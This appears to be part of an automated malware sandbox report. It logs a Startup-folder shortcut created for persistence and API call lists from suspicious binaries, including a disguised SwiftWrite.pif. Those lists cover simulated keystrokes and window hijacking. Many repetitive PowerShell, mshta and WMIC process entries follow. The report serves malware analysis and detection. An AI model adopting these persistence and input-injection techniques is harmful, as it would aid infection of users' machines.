Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51C4514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,	15_2_00007FF7A51C4514
Source: C:\Users\Public\Guard.exe	Code function: 23_2_009759B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	23_2_009759B3
Source: C:\Users\Public\Guard.exe	Code function: 23_2_00905EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	23_2_00905EDA
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_001B59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	27_2_001B59B3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_00145EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	27_2_00145EDA

Source: C:\Users\Public\Guard.exe

Code function: 23_2_009133B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

23_2_009133B7

Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
